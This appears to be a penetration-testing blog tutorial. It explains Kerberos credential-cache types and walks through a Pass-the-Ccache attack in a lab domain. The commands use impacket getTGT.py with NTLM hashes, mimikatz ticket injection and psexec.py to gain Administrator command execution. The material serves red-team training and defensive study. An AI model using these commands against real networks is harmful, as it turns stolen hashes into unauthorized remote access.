In this post, we’ll discuss how an attacker uses the ccache file to compromise kerberos authentication to access the application server without using a password. This attack is known as Pass the cacche (Ptc).

Table of Content

Credential Cache

Ccache Types

Walkthrough Pass the Ccache attack

• Method 1:Mimikatz
• Method 2: KRB5CCNAME

Credential Cache

A credential cache (or “ccache”) contains the Kerberos credential although it remains valid and, typically, while the user’s session lasts, so that multiple service authentication (e.g. connecting to a web or mail server more than once) does not involve contacting the KDC at every time.

A credential cache usually holds one initial ticket that users obtain using a password or another form of identity verification. If this ticket is ticket-granting, users can use it to obtain additional credentials without the password. Because the credential cache does not store the password, a compromised machine can cause less long-term damage to the user’s account.

A credentials cache stores a default client principal name, which the system sets when it creates the cache. This is the name shown at the top of the klist.

Ccache Types

The MIT Kerberos library supports several kinds of credentials cache. Not all platforms support them.

FILE caches: These are the simplest and most portable. A simple flat file format is used to store one credential after another. This is the default ccache type.

API: It is only implemented on Windows. It communicates with a server process that holds the credentials in memory for the user, rather than writing them to disk.

DIR points:  To the storage location of the collection of the credential caches in FILE: format. It is most useful when dealing with multiple Kerberos realms and KDCs.

KEYRING: It is Linux-specific, and uses the kernel keyring support to store credential data in unswappable kernel memory where only the current user should be able to access it.

MEMORY caches: These store credentials that don’t need availability outside of the current process. Memory caches are faster than file caches and automatically destroy themselves when the process exits.

MSLSA: It is a Windows-specific cache type that accesses the Windows credential store.

Read More about  MIT Kerberos Credenial Cache from here: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html

Walkthrough Pass the Ccache attack

Pass the ccache attack uses ticket granting ticket to access the application server without go by kerberos Authentication, here we will try to store Kerb5_tgt in form of ccache and use or pass this ccache file to service application server.

Method 1:Mimikatz

So we have use impacket python script gettgt.py which will use a password, hash or aesKey, it will request a TGT and save it as ccache.

python getTGT.py -dc-ip 192.168.1.105 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator

with the help of above command, you will be able to request Kerberos authorized ticket in the form of ccache whereas with the help of the following command you will be able to inject the ticket to access the resource.

Once you have the ccache, use mimikatz to pass the ccache file and try to access the resource, thus you need to execute following commands:

privilege:debug

kerberos::ptc Administrator.ccache
misc::cmd

Note: Here we first generated the ccache and then used mimiktaz, but you can also drag the ccache file from the memory using Klist-c, which will list all the ccache stored in the memory and then use mimikatz to access the resource.

And so a new command prompt will be triggered, which will be the CMD of the requested resource service. You can see how we access the resource without using the password or ticket.kirbi file to access the resource.

push \\ignite.local\c$

Method 2: KRB5CCNAME

Similarly, we use getTGT to generate the ccache and pass the ccache file for the requested service using KERB5CCNAME. This approach is a completely remote attack without using the local system of the compromised victim. However, you need to compromise NTLM hashes for that. Type the following to conduct the pass-the-ccache attack remotely.

python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika
export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

To learn more about Lateral Movement in Red Teaming. Follow this Link.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Contact on Twitter and LinkedIn

Related posts:

Lateral Movement: WebClient Workstation Takeover Lateral Movement: Remote Services (Mitre:T1021)